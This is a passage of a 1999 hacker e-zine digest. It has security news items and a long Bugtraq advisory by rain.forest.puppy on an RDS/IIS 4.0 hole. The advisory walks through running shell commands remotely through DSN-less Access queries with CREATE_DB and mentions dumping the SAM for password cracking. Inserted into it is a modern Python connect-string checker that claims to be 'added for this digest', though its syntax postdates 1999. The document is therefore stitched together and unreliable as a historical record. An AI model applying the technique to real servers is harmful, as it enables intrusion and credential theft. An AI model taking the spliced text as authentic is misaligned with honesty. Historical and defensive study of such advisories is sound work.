http://www.wired.com/news/news/politics/story/17074.html
The Standard Online - Austria
http://derstandard.at/aktuell/article_web.asp?15471
National Post - Canada
http://www.nationalpost.com/home.asp?f=981231/2145043.html

January 5, 1999
Team spl0it joins the Legions of the Underground in their War against China and Iraq.
HNN Archive for January 5, 1999 http://www.hackernews.com/archive.html?010599.html

January 6, 1999 Legions of the Underground releases a statement contradicting their earlier statements that claims that they never had destructive intentions and blame the media for letting this get out of hand. HNN Archive for January 6, 1999 http://www.hackernews.com/archive.html?010599.html LoU Statement http://www.hackernews.com/archive/louwar/lou1.html

January 7, 1999 An unprecedented joint statement and press release from every major hacking group in the world is released condemning the Legions of the Underground and their Declaration of War. HNN Archive for January 7, 1999 http://www.hackernews.com/archive.html?010799.html Joint Statement http://www.hackernews.com/archive/louwar/jointstat.html Joint Press Release http://www.hackernews.com/archive/louwar/jointpress.html

January 8, 1999 Incredible support is seen across the internet for the Joint Statement released by the International Hacker Coalition. The Legions of the Underground release a statement in response to the international coalition. HNN Archive for January 8, 1999 http://www.hackernews.com/archive?html010999.html Statement from Legions of the Underground http://www.hackernews.com/archive/louwar/loustat.html

January 11, 1999 The Chinese web site promoting human-rights is cracked again. It is unknown who cracked the site this time. http://www.humanrights-china.org Archive of cracked site http://www.hackernews.com/archive/chinaHR/chinaHR.html

January 13, 1999 The Legions of the Underground tell Wired magazine that the original press conference was a fake and that the people present during the press conference were spoofed. There is no evidence to support this but there is none to deny it either. Wired http://www.wired.com/news/news/technology/story/17273.html

January 17, 1999 Several news organisations from around the world pick up the story.
MSNBC http://www.msnbc.com/news/232090.asp Spiegel Online - German http://www.spiegel.de/netzwelt/jump.phtml?channel=netzwelt&rub=02&cont=themen/hackerkrieg.html AP Wire - German http://www.yahoo.de/schlagzeilen/19990112/vermischtes/916106760-0916103236-0000307154.html Kitetoa - French http://www.kitetoa.com/Pages/Textes/laguerredeLoU.htm

February 9, 1999 The Legions of the Underground open a website offering web hosting and security consulting services. HNN Archive for February 9, 1999 http://www.hackernews.com/archive.html?020999.html

July 23, 1999 Optiklenz (Steve Stakton) issues a statement concerning the whole 'war' and the current state of .gov and .mil web page defacements. Statement http://www.hackernews.com/archive/louwar/legspeaks.html

@HWA

35.0 L0pht Releases Public Beta of AntiSniff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com contributed by Weld Pond

L0pht Heavy Industries today announced the public beta release of its AntiSniff network security software, which can detect attackers surreptitiously monitoring a computer network. AntiSniff is a whole new breed of network security tool, designed to detect remote computers that are packet sniffing. L0pht Heavy Industries http://www.l0pht.com/antisniff

@HWA

36.0 Bill to Limit Crypto Exports Approved
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com contributed by Ryan

The House Armed Services Committee has voted 47-6 to replace an industry-endorsed encryption bill with substitute legislation drafted by law enforcement advocates. The industry-endorsed bill would relax but not remove export controls. The version approved by the House Armed Services Committee would grant the president complete authority to deny any export controls that he considers "contrary to the national security interests of the United States." Wired http://www.wired.com/news/news/politics/story/20872.html

Industry Crypto Bill in Peril by Declan McCullagh 5:00 p.m.
21.Jul.99.PDT WASHINGTON -- And you thought Congress was going to override White House rules restricting US firms from exporting encryption products. Well, you were wrong. The House Armed Services Committee voted 47-6 Wednesday to replace an industry-endorsed encryption bill with substitute legislation drafted by law enforcement advocates. "Proliferation of encryption technology would harm our ability to gather vital intelligence, jeopardize our early threat warning and attack assessment, risk our ability to maintain an information-based advantage over our enemies, and place our nation's most secure systems at risk," said Representative Curt Weldon (R-Pennsylvania), who introduced the amendment. The tech industry bill, sponsored by Virginia Republican Bob Goodlatte, would relax but not remove export controls on everyday encryption products, such as Web browsers and email programs. The version approved by the House Armed Services Committee would grant the president complete authority to deny any export controls that he considers "contrary to the national security interests of the United States." The House Rules Committee will decide what version, if any, will be voted on by the entire chamber. Experts expect that if the industry-backed version wins, opponents would try to add crippling amendments during a floor vote. Weldon's bill contains no domestic restrictions on encryption, but the measure is hardly what tech firms had hoped for. It says any White House export decision cannot be challenged in court -- an attempt to block lawsuits like one brought by a math professor that won a recent victory in the Ninth Circuit Court of Appeals. Under Weldon's plan, the president will set the "maximum level of encryption strength" that companies may export and will convene a 12-member "Encryption Industry and Information Security Board" to advise on how widespread foreign encryption products are.
"It's exactly the type of vote you'd expect from the House Armed Services Committee," said Jim Lucier, an analyst at Prudential Securities. "This vote is not particularly meaningful." Industry groups had warned members of the committee that proposals such as Weldon's were unacceptable. "ITI anticipates counting tomorrow's committee mark-up as one of the key votes for our 1999 'High-Tech Voting Guide,' which will measure congressional support for issues of importance to the information technology industry," Rhett Dawson, president of the Information Technology Industry Council, said in a letter Tuesday. It didn't work. Not only did industry groups lose but prominent Republicans, such as J. C. Watts of Oklahoma, voted for Weldon's amendment.

@HWA

37.0 Russian and Ukrainian Govs Monitor Internet Communications
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com contributed by Lionel

The FSB (Russia's Federal Security Bureau, ex KGB) and the SBU (the Security Service for the Ukraine) require that some of their countries' internet providers give them control over their network. The FSB asks providers to monitor all the communications made by their clients; the providers have to accept the control or have their license canceled. Ukrainian providers have to accept the SBU control in order to get a license. Furthermore, they have to buy the hardware used in the monitoring. This technology allows the security services to not only access the logs but also to read private mail. Yahoo News - French http://www.yahoo.fr/actualite/19990722/multimedia/932640720-yaho150.220799.125237.html

@HWA

38.0 Here we go again, Mitnick to be Sentenced on Monday (Supposedly)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com contributed by Space Rogue

After numerous delays Kevin Mitnick will finally be sentenced for the federal charges that he has pleaded guilty to.
The biggest issue is how much restitution he will have to pay if he is ever released. Remember that after the Federal case is completed Kevin still needs to answer charges from the State of California. The federal hearing will be held on Monday July 26, at 1 pm in Courtroom 12 at the LA Federal Courthouse, 312 N. Spring Street. FREE KEVIN http://www.freekevin.com

@HWA

39.0 Virus Infestations on the Rise (?)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com contributed by nvirB

An annual survey conducted by ICSA Inc. has found the rate of virus infections is still rising despite the use of Anti-Virus software. ComputerWorld http://www.computerworld.com/home/news.nsf/all/9907224icsa ICSA http://www.icsa.net/99survey/

Corporate virus infection rate on the rise By Kathleen Ohlson

As security experts keep pounding users and corporations to use antivirus software, the rate of virus infections is still rising -- despite most PCs and servers having antivirus software installed, according to an annual survey conducted by ICSA Inc. In January and February of this year, the average rate of infection per month per thousand PCs was approximately twice the rate in 1998 and four times that of 1997, the Reston, Va., security company said. ICSA is affiliated with Gartner Group Inc. Yet among the technology professionals surveyed at 300 U.S. companies and government organizations, 83% said at least nine out of 10 of their PCs are protected by some form of antivirus software, ICSA said. It's not enough for companies and users to install antivirus software on servers and desktops, said Larry Bridwell, technical program manager for ICSA Labs, which conducted the study. Along with updating the software regularly, companies must implement security policies and educate users, such as warning them not to open documents if they don't know the sender. "It's too dangerous," Bridwell said. "Viruses have become very dynamic," spreading through downloads and attachments.
Other findings include the following:
- Average recovery time for major infections (25 infected PCs or more at once) was 24 hours.
- The median cost for those kinds of virus disasters, including employee downtime, was $1,750. Some respondents reported that costs totaled $100,000 in a single virus event.
- By spreading through automated e-mail, Melissa hit a huge portion of users within the first few weeks.

Survey sponsors included Computer Associates International Inc., Network Associates Inc., Panda Software and Symantec Corp. Anyone interested in seeing the results can register, free of charge, to view the survey on the ICSA Web site.

ICSA/InfoSecurityMag Press release: Study Confirms Increased Security Risks of E-Commerce

Contacts: Andy Briney 781-255-0200 abriney@infosecuritymag.com Barbara Rose ICSA (717)-241-3233 brose@icsa.net

NORWOOD, MA (JULY 8)--A new study confirms that organizations conducting Internet e-commerce experience far more information security breaches than those that do not conduct e-commerce. According to a survey published today in Information Security magazine (www.infosecuritymag.com), companies conducting business online are 57 percent more likely to experience a proprietary information leak and 24 percent more likely to experience a hacking-related breach. Overall, the number of companies hit by an unauthorized access (hacking/cracking) breach increased nearly 92 percent from 1997 to 1998, the study reports. "The 1999 Information Security Industry Survey" appears in the July 1999 issue of Information Security, published by ICSA Inc., the Reston-Va.-based Internet security company. Co-sponsored by ICSA and Global Integrity Corp., the study also reveals statistics on infosecurity software and hardware use, organizational budgets for security, the use and effectiveness of infosecurity policies, and salary and personnel issues affecting professionals engaged in securing their organization’s data, communications and technology.
Overall, companies suffered an average loss of $256,000 to security breaches last year, according to the study. Of the 745 organizations polled in the survey, 91 quantified their financial losses for a total of $23.3 million. "Employee access abuses continue to be the most common security breach, but it’s clear that the growth of e-business has intensified the threat of computer attacks from outside the company’s walls," said Andrew Briney, editor-in-chief of Information Security. The number one security priority of survey respondents was protecting their organizations against such attacks, according to the survey. More than one in five (21 percent) said "preventing hackers/crackers" was the single most pressing security concern in their organization. "Preventing malicious code and viruses" was the biggest concern for 17 percent of respondents, while another 15 percent said "e-mail security." For complete survey results, visit Information Security’s Web site at www.infosecuritymag.com. Based in Norwood, Mass., Information Security magazine is the leading trade monthly for IT, networking and information security practitioners. ICSA, Inc., a Gartner Group affiliate, is the world's source of objective, independent, Internet security assurance services. ICSA headquarters are located in Reston, Va. For more information, contact ICSA at 703-453-0500.

@HWA

40.0 Do Handheld Electronics cause Problems with Avionics?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com contributed by kshaddri and others

Yesterday HNN reported that a man in England had been sentenced to a year in jail for using his cell phone on an airplane. Not being aircraft designers we wondered just how serious the risks really were. A lot of people took the time to send us some information. Computer-Related Incidents with Commercial Aircraft http://www.rvs.uni-bielefeld.de/publications/Incidents/ Electromagnetic Interference with Aircraft Systems: why worry?
http://www.rvs.uni-bielefeld.de/publications/Incidents/DOCS/Research/Rvs/Article/EMI.html

While it would seem that passenger electronics could in theory cause problems on board an aircraft it is hard to pin down actual instances of this happening. Clearly more research is needed before people have to spend time in jail.

@HWA

41.0 Alert: RDS IIS vulnerability/fix
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Fri, 23 Jul 1999 12:21:20 -0500
Reply-To: ".rain.forest.puppy."
Sender: Bugtraq List
From: ".rain.forest.puppy."
Subject: Alert: RDS IIS vulnerability/fix
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM

#### ALERT! #### RDS/IIS 4.0 Vulnerability and Script #### ALERT! ####
By rain forest puppy / ADM / Wiretrip

"it...is direct, immediate, and almost 100% guaranteed to work....THE NUMBER OF HUGE SITES THAT ARE VULNERABLE IS RIDICULOUS!" -Russ Cooper, NTBugtraq

"This exploit also does *not* require the presence of any sample web applications or example code...the issue affects at least 50% of the IIS servers I have seen" -Greg Gonzalez, NTBugtraq

"Groovy, baby." -Austin Powers, Spy who Shagged Me

- - -

Table of Contents:
1. Names, PRs and the Media: State of Security Advisories
2. RDS Vulnerability Background
3. *MY* Guess at Greg's RDS Vulnerability
4. Bonus Aspects of My Script
5. More Bonus Features
6. How to Secure Your Server
7. Command Line Options
8. Random Q & A
9. Signoff
10. The code!!!!

- 1 - Names, PRs and the Media: State of Security Advisories

When I was at DefCon, I had an interview with a reporter who was doing a story on 'hacker handles'. Of course, with a handle like Rain Forest Puppy, I was a sure-win. After a 20 minute chat, the last question he asked me was "What is your real name?" Of course, my response was "does that matter?" Well, to him it did. It seems like it matters to all the big, formal media types and vendors. A perfect example of this would be the whole RDS saga.
Greg Gonzalez's original post gave me credit, since he used some of what I talked about in my ODBC advisory posted to Bugtraq earlier (thanks, Greg!). Russ Cooper did a recap, but failed to mention me. Microsoft's advisory acknowledged Russ and Greg as well, sans me. Now, I'm not an egomaniac that needs to see my name splashed over everything. For that matter, those of you who know me personally know how laid back I am concerning most issues. The point I'm trying to make is whether or not a name is 'unsuitable' for mention in something as flashy as a Russ or MS post (although side note, I must admit, Wired and ZDNet have lightened up to this fact, especially lately with all the Dildog and Orifice talk going on). If I remember correctly, David Litchfield got some mentions for various vulnerability findings he had. But everyone referenced him as David Litchfield, not 'Mnemonix', which is his hacker handle (BTW, greetings to Mnemonix. Thanks for serving as an example. :) Even lately, for those of you Bugtraq fans out there (hey, how the hell are you reading this, anyway!?!?!), you'll have noticed gone are the loveable bytes of 'Aleph1' in place of Elias Levy. Now, in Aleph1's defense, I can see justification of the shift. But the general fact that there is a need/trend for a shift is concerning me. The only taboo I can think of for the 'evil' of a hacker handle is the issue of the obvious: anonymity. Apparently I must be running around doing 'very bad things' (funny movie, BTW), and so I need to hide who I really am, right? Uh, no. (For lack of a snappy comeback) I don't want to make this diatribe overly long, since I know you're only here for the exploits anyway :) But seriously, why use a handle? Well, there is a sense of tradition, for one. I shall not explain, because I think it's apparent. The other is a sense of community. If you're going to engage in a security discussion, why not do it with other security professionals. 
And where can you just so happen to find a large gaggle of people who know about security? Your local IRC server, sitting in #hackphreak (watch out, JP logs), #hackteach, etc. These people have nicknames themselves. So get yourself a nick and join in the conversation! But really, I use an alias. Does that make me evil? If I told you my real name, would that shift your perspective of me into the light of good? We'll get back to this, I want to transgress to another issue. I use a handle. My only collateral at this point is my name, and my name alone. If I find a big hole, post a research paper, etc, it adds nothing but perhaps an "atta'boy" to the accomplishments of my nickname. I've talked to people in real life and held discussions about that 'Rain Forest Puppy' guy, they not knowing I was Rain Forest Puppy. The accomplishments belong to that name, and that name alone...unless I start equating that name with other things. So, let's pretend I did. Let's say I tossed my real name out there, and got that associated with my handle. Now people in real life will equate the findings of Rain Forest Puppy to me. I can add in my company name. Now my company can ride the 'success' (if you will) of my findings as well, just because they're associated with my name. (Come on, you know these situations exist. Transmeta is cool just because the name 'Linus' is involved.) If I equate all kinds of aspects together, I can then distribute the attention (a.k.a. advertising) to them all as well. Think about it....if I found the next remote root compromise in, say, sshd, I could slap not only my handle and name but also my company name (Amazonian Trees, Inc) all over it! Wow, would that not be great marketing for Amazonian Trees, Inc, especially if ATI's primary service was security related! But hey, it's America. We live to make money, so it seems. So why not do this? Right? Well, 'tis also the trend. Look at all the press releases on security issues.
The most recent one was by Greg Gonzalez himself, for his company Information Technologies Enterprises, Inc. The press release is at http://www.infotechent.net/itenews.htm Now, what I find interesting is that Greg has made a post to NTBugtraq about the RDS vulnerability, yet will not release details of the vulnerability until next week. Hmmm. Ok, so he can't release details, but he can release press releases about it. Your point was made with the post to NTBugtraq...the point of the press release is to ride the fame to gain corporate exposure (which I'm equating as an excessive, corporate, political machine type move which isn't all that wonderful). Not to pick on Greg, because it's the trend. Look at WebTrends. They issued a press release on 'their finding of security vulnerabilities in IIS sample scripts' (never mind the fact that I had talked about such in a previous Phrack article last December). The press release is at http://www.webtrends.com/news/releases/release.asp?id=81 Wow, a vendor of a security scanner using the finding of vulnerabilities as free marketing for their products. Well, do it where you can, right? I will move off this subject, because L0pht has a nice long composition on the matter in the Soapbox on their website, at http://www.l0pht.com/~oblivion/soapbox/index.html One interesting statement L0pht makes, going back to Greg Gonzalez and Russ Cooper keeping the details of the RDS vulnerability to themselves for a week: "Now we have software vendors keeping things secret. At least secret for a substantial period of time. Is this the way we want the industry to behave?" Wow, right on, brothers Mudge, Dildog, Weld Pond et al. Greetings, BTW. ---- Credits and Thank Yous ---------------------------------------------- I'd like to take this brief moment to say thank you to L0pht (www.l0pht.com) for helping me test my perl script and taking time to review my advisory. 
I'd also like to thank Vacuum of www.technotronic.com and Mike Dinowitz of www.houseoffusion.com for their input and testing as well.
--------------------------------------------------------------------------

So back to the 'only a handle' thing. You have to understand that I have a different perspective on it all. I publish everything under an anonymous handle. What do I gain from this? Nothing personally. Nada. Zip. The handle itself may gain some fame, but not me personally. I do not profit from this one way or another. What I do I do because I want to, on my free time--and do it in a manner that is not greedy in any aspect. I don't seek to gain, and in the current setup, I really can't gain a whole hell of a lot. But I'm the bad guy, I forgot. It's much more normal to leverage a security vulnerability as a marketing tool than it is to just 'give' time and research away. Wow, I need to get with the Y2K I guess. Fine then. (Last tangent, then we'll get to the RDS issue, I promise :) So, going back to you seeing me in the light of good.... Could you better relate if you had a 'normal' name? Are you embarrassed to say/use 'Rain Forest Puppy' in conversation/publication? (Well, I mean this generically for all hacker handles, but I'm specifically talking about mine here) Would I be seen as more a security resource/less of an evil hacker if you had a name to associate with my handle? Well, I guess I should make that step. From now on, you can associate Mr. Russell F. Prigogine with the nick Rain Forest Puppy (Hmmm...no, the initials are not mere coincidence...clever, eh?). But since the big 'Russ' on campus is Russ Cooper, NTBugtraq moderator extraordinaire (who believes sample apps are not a security concern worth talking about. Real slick, Russ), I would prefer that Mr. R.F. Prigogine (Mr. optional) be used, if you can't--or don't want to--use the nick Rain Forest Puppy. So there. (As some would say) I sold out (oh, the horror of it).
JP, add that to your profile database. While I gather the broken pieces of my dignity we'll move along to what you really want... - 2 - RDS Vulnerability Background Last Friday Greg Gonzalez (re)posted his findings of vulnerabilities in regards to the RDS problems originally detailed in MS98-004, which came out around July 16, '98. He took that issue (which is basically the simple fact that 'Remote Data Service' components allow *remote* access to your *data*....who would have thought?) and combined it with the Jet pipe/VBA delimiter 'feature' I discussed in my recent advisory. The result? 1. You can make remote queries via RDS 2. You can embed NT command line commands in queries Well, that's a pretty good combo. (side note, not to brag or anything, but I mention the fact that RDS can be used to do that in my ODBC advisory, under the title 'Msadc'). But, Greg threw in a twist which supposedly is the kicker: 3. You don't need user IDs (and therefore no password required), does *not* require the presence of any sample Web applications or example code, or even an active database I suppose that's a pretty big kick. Wow, no UIDs/passwords, NO SAMPLE SCRIPTS! Well, I guess that means Russ Cooper will let the post through then... (if you don't get it, go back and re-read section one). So Greg can do all that. And, to reiterate how dangerous this problem really is... "it...is direct, immediate, and almost 100% guaranteed to work....THE NUMBER OF HUGE SITES THAT ARE VULNERABLE IS RIDICULOUS!" 
-Russ Cooper, NTBugtraq

"This exploit also does *not* require the presence of any sample web applications or example code...the issue affects at least 50% of the IIS servers I have seen" -Greg Gonzalez, NTBugtraq

*** MEDIA FOLKS *** As it seems it's fun to attach dollar loss amounts to advisories, I will say the potential amount of damage, due to the fact that at least 50% of all IIS servers Greg has seen (hopefully he's seen a lot) are vulnerable, using my sophisticated reliable statistical computation method that is authoritative, I'd place damage loss somewhere in the 'close to Bill Gates salary(tm)' range.

Now, the sad part. As I mentioned before, both Greg and Russ (from this point on, all instances of 'Russ' refer to Russ Cooper, and not the name R. F. Prigogine) know the details of this vulnerability. And yet they are keeping them amongst themselves until next week. Does this even disturb anyone? Greg says at least 50% of the IIS servers are vulnerable... DO WE WANT RUSS COOPER WITH THE KEYS TO 50% OF IIS SERVERS ON THE INTERNET? Ok, I have a scenario that's the same in principle, but will disturb people even more:

---- Begin same scenario ------------------------------------------------
Rain Forest Puppy (or R. F. Prigogine, if it makes you feel better/is more visually pleasing) has found a hole in the latest build of Apache web server. There's a hole. I will announce there's a hole. I'll write up a few PRs as well. But I will not tell you the exact nature of it. Don't worry, Apache group will code a fix, and you'll be all set in a jiffy. In the meantime, I'm not going to release the details of the exploit of the hole. Instead I'm going to just keep it to myself....and my good buddies Vacuum, Antilove, Stranger, and the rest of the Wiretrip and ADM crews.
-------------------------------------------------------------------------

Hmmm....I bet *that* disturbed you.
How about a better translation:

---- Begin translated same scenario -------------------------------------
I, RFP, have found a hole in Apache that I will not tell you about until later, but in the meantime, me and my hacker buddies will know about it! Nnnnnnaaaaaaayyyyyyaaaaahhhhhh! So sit back and feel helpless.
-------------------------------------------------------------------------

What's the difference? Only the integrity of the people involved. Again, a name thing perhaps. Russ Cooper, Greg Gonzalez, they're Ok. Rain Forest Puppy, Antilove, nope, that's scary. You don't even know if Greg Gonzalez isn't really a hacker that goes by 'Digital Killer'. I push for the point that no matter who it is in any case, it's wrong. Elias Levy would have told everyone the bug. :) NTBugtraq = moderated disclosure. Hmmm. I still like Russ's "Would you pay?" Administrivia from Feb 99, in which he says: "Someone else makes the Security Portal and you get what they think you need" As opposed to getting what Russ thinks we need instead? It all depends on whether or not the other guy denies posts about sample scripts....(if you *still* don't get it, re-read section one AGAIN). Ok, ok, so that RDS background turned more into a political thing. Well, that's because it is. At this point, Russ and Greg have the keys to IIS servers. I don't know about you, but I'm not liking it. So I'm getting off my ass and doing something. Besides the fact that this is all published stuff at this point. Also, I may be considered 'irresponsible' for posting the exploit. Now, I would say *maybe* it would be debatable if I had posted *only* the exploit. But I have posted not only a very long diatribe, but also my guess of the vulnerability, which includes examples of analysis and theory. I also detailed out how to secure your server, from this hole in particular as well as other security problems in general.
My hopes are to educate people on what the problem is, and how I went about finding it so that they can perhaps learn how to do it themselves. Education. It's the key, and that's what I'm trying to do. No, no vendor education...ADMIN education. USER education. I know I will probably be futile as a whole in the end, but maybe a few people will learn something, and that's all that matters to me.

- 3 - *MY* Guess at Greg's RDS Vulnerability

(I say 'guess' because I may not be right. But in any event, I wouldn't be writing all this unless I found something moderately interesting ;)

Ok, so Greg's RDS vulnerability has three main aspects:
1. You only need RDSServer.DataFactory component
2. It uses Jet queries with my embedded VBA via pipes trick
3. You don't need userIDs (and therefore no password required), does *not* require the presence of any sample Web applications or example code, or even an active database

Now, for those of you who don't know, RDS is basically a way to do remote data queries to a server. This is done over the web. Basically your client app communicates via HTTP to the /msadc/msadcs.dll on your server. The msadcs.dll exposes the RDSServer.DataFactory object, better known as the AdvancedDataFactory. Now AdvancedDataFactory only has four methods, so we're kind of limited on what we can do. We can CreateRecordSet, Query, SubmitChanges, and ConvertToString. Query and SubmitChanges require a valid database to work upon. The other two are just data mangling functions. So there you have it, that's what we have to work with. I played with CreateRecordSet and ConvertToString. This actually relays data from the client, to the server, and back. My hopes were that somewhere in there I could slip one of my pipe-VBA-shells in there and do fun stuff. But nope, all they did was regurgitate the data in a different flavor. Oh well. SubmitChanges just basically does an elaborate UPDATE/INSERT, where it just syncs the server's database with the client's recordset.
So that leaves Query. Well Query lets us run queries against an (existing) database. And we know we can embed our pipe-VBA-shells in queries, so Query looks good. But this is nothing spectacular. And there is one catch: the need for an existing database. We need to pass a DSN to the AdvancedDataFactory to actually run the query on. The problem with the DSN is that:
1. DSNs can require UIDs and passwords
2. There's no way to get a list of available DSNs (** through RDSServer.DataFactory functions, that I'm aware of **)
3. I'd say a DSN constitutes an 'active' database

So DSNs blow away point 3 of our known things about Greg's RDS vulnerability. What if we can get around using DSNs? Well, we can. See, you can go the easy route by specifying "DSN=rfp", and then the server keeps all the internal information about that DSN, including driver, actual database file location (if it's a file-based driver), UID, password, connection parameters, etc. Well, what's fun is that we can directly give all that stuff in the query setup instead of a DSN. Let's say we setup a DSN named 'rfp' (for Rain Forest Puppy or R. F. Prigogine). We will use these parameters:
DSN name 'rfp'
Microsoft Access (Jet) driver
c:\rfp.mdb for our database
UID will be 'rfp'
password will be 'prigogine'

So by invoking "DSN=rfp", the server knows to use the Access driver on the c:\rfp.mdb file. DSNs are a nice tight way to precompose all that information. Or we can do it on the fly. Rather than issuing a "DSN=rfp" connect string, I can use instead:
"driver={Microsoft Access Driver (*.mdb)}; dbq=c:\rfp.mdb;"
This will still invoke the Access (Jet) driver, and tell it to directly use c:\rfp.mdb. No UID. No password. Not even worrying about if/what DSNs exist. In the words of Cartman, "Sweet". That whacks out part of known point #3 (no UID or password).
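The DSN-less connect string is the pivot of the whole trick: anything that lets a client hand a raw connect string to the server (as the DataFactory does) lets the client name its own driver and database file instead of a preconfigured DSN. The following is an added example written for this digest; it is not rain forest puppy's script and not Microsoft code. It parses connect strings by the ODBC rules (semicolon-separated key=value attributes, with a brace-quoted value allowed to contain ';', which is why "driver={Microsoft Access Driver (*.mdb)}" works) and then applies a hypothetical server-side policy check: if the application only ever expects "DSN=something", any client-supplied driver=, dbq= or CREATE_DB attribute (the Access driver attribute that makes the driver create an empty .mdb) is grounds to refuse the request.

```python
"""ODBC connect-string parser and DSN-less policy check (added example).

Assumptions (not from the original advisory): the policy function
dsn_less_findings() is a hypothetical check an application could run on a
client-supplied connect string before it is handed to an ODBC layer.
"""

# Attributes that bypass a server-side DSN when a client supplies them.
DIRECT_ATTRS = ("driver", "dbq", "create_db")


def parse_connection_string(conn: str) -> dict:
    """Return {attribute_name_lowercase: value} for an ODBC connect string.

    Attributes are separated by ';'. A value starting with '{' runs to the
    matching '}' and may itself contain ';' or spaces, so
    'driver={Microsoft Access Driver (*.mdb)}' is one attribute.
    """
    attrs = {}
    i, n = 0, len(conn)
    while i < n:
        # Skip separators and whitespace between attributes.
        while i < n and conn[i] in "; \t":
            i += 1
        if i >= n:
            break
        eq = conn.find("=", i)
        if eq == -1:
            raise ValueError(f"attribute without '=' at offset {i}")
        key = conn[i:eq].strip().lower()
        j = eq + 1
        while j < n and conn[j] == " ":
            j += 1
        if j < n and conn[j] == "{":
            close = conn.find("}", j)
            if close == -1:
                raise ValueError(f"unterminated '{{' in value for {key}")
            value = conn[j + 1:close]
            i = close + 1
        else:
            end = conn.find(";", j)
            if end == -1:
                end = n
            value = conn[j:end].strip()
            i = end
        attrs[key] = value
    return attrs


def dsn_less_findings(conn: str) -> list:
    """List reasons a connect string sidesteps a preconfigured DSN.

    An empty list means the string only names a DSN (plus credentials);
    anything else means the client chose driver, file or creation itself.
    """
    attrs = parse_connection_string(conn)
    findings = []
    if "dsn" not in attrs:
        findings.append("no DSN named")
    for key in DIRECT_ATTRS:
        if key in attrs:
            findings.append(f"{key}={attrs[key]!r} supplied by client")
    return findings


if __name__ == "__main__":
    # Constructed sample connect strings: the DSN form and the on-the-fly form.
    samples = [
        "DSN=rfp;UID=rfp;PWD=prigogine",
        "driver={Microsoft Access Driver (*.mdb)}; dbq=c:\\rfp.mdb;",
        "driver={Microsoft Access Driver (*.mdb)}; dbq=c:\\rfp.mdb; CREATE_DB=c:\\rfp.mdb;",
    ]
    for s in samples:
        verdict = dsn_less_findings(s)
        print(s)
        print("   ", "OK (DSN only)" if not verdict else "REJECT: " + "; ".join(verdict))
```

The parser is deliberately strict about braces because the classic bypass hides the whole driver name, parentheses and all, inside them; a naive split on ';' and '=' would still work on these particular strings but breaks on a driver name containing ';', and a check that only looked for "dbq" would miss CREATE_DB.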
We're going to use the RDSServer.DataFactory control (known point #1), and we're going to use the Access driver, with fun pipe-VBA-shell features (known point #2). We're not using any other web sample scripts, so that cuts out another portion of known point #3. Oh, we're so close...can you taste it? (and what does it taste like? chicken?)

There's still one minor detail. Notice we have to specify the 'dbq=' parameter in the connection setup. And this needs to be a valid file. If it's not, the SQL engine on the server side will fail and return errors before it even gets around to looking at our queries. But damn, we need an .mdb file to connect to. Well, if you look in the Access ODBC reference on Microsoft's website (which sucks, half the links were broken at various moments through the night while sifting through it...go MS. I don't blame you though--you probably engineered your site/servers with Microsoft products, and that explains it right there) you will see that you can pass a CREATE_DB parameter to the Access driver. This will cause the driver to construct a valid (empty) .mdb file. Woohoo! (not to be confused with w00w00; the former is an expression of joy, the latter is a cool group of guys that I had the fortune of hanging out with at DefCon)

So in our connection setup we pass a "CREATE_DB=c:\rfp.mdb" attribute with everything else and lo and behold, it......

----- Some words about my sponsors ---------------------------------------

-- www.technotronic.com

Technotronic! Great place! Run by fellow Wiretrip'er Vacuum, who is also a co-founder of Rhino9 (before Rhino9 'disbanded'; Neon, Horizon, Xaph: come back to the US!), boasting a slick HTML design recently redone by yours truly (Rain Forest Puppy/R. F. Prigogine), it's definitely a good site for the latest security information--especially while PacketStorm is struggling to get back on its feet (thanks, JP. Now die. What, you're suing me now?!?)
While you're there, be sure to check out:

* Winfingerprint! -- coded by Vacuum, this tool lets you remotely query a Windows box and see if it's a PDC, BDC, member server, SQL server, etc. Also look for the Unix port of it by me sometime soon (after I finish all this RDS stuff)
* Horizon's Page! -- that's right. Elite HTML coded by Humble himself. Problem was he didn't know where to put the shell code...? J/K :) The URL is /horizon/
* Newest R9 Tools! -- coming soon. Before 3/4ths of Rhino9 moved to Germany, there was one last code fest, and some fun binaries came out of it. Look for them soon!

Technotronic also has the R9 mirror at rhino9.technotronic.com

-- www.l0pht.com

L - zero - p - h - t. Everybody knows L0pht (even senators!) A very active 'independent security (watchdog) group' which includes Dr. Mudge & Dildog (BO2K creator). While you're there, be sure to check out:

* L0phtcrack! -- one of the best NT password crackers out there! This will prove highly useful if you use my script to dump the SAM and grab the backup (not that I encourage hacking...I've done this many times in LEGIT contracted audits). It's a personal tool I've standardized on.
* Advisories! -- L0pht releases a very nice variety of advisories, from Windows DLL problems and Cold Fusion script problems to Unix race conditions and symlink vulnerabilities.
* NFR Modules! -- they've teamed up with NFR to be the supplier of many interesting N-code/NFR modules. They have a nice selection for your popular network attacks.

** plus I must note that the Palm Pilot stuff, Soapbox, and BBS are pretty awesome as well!

-- www.houseoffusion.com

A great independent Cold Fusion site! The site of a great friend of mine, Mike Dinowitz, who is my 'go to' man for all things Cold Fusion and has helped me out immensely with various Cold Fusion language issues (read: helped me work through some of the various Cold Fusion exploits that have surfaced). He does offer training for Cold Fusion...see 'Training Info' under ''.
He co-authored "Advanced Cold Fusion 4.0 Application Development" and "Cold Fusion Web Application Construction Kit" vols 2 and 3, and was the founding member of Team Allaire. Plus, he's an all-around good guy(tm). Also an editor of CF Advisor, at www.cfadvisor.com. While you're there, be sure to check out:

* MunchkinLAN! -- a CF based web scanner, which is actually very minimal code and runs out of an Access db.
* Mike's Mods! -- many modifications to the Cold Fusion Forums scripts, which include speed/operation improvements.
* CF-Talk! -- Mike is the moderator/owner of the CF-Talk list, which is a high traffic list discussing Cold Fusion related development issues, security, etc.

-- Thanks again to all of the above!

-------------------------------------------------------------------------

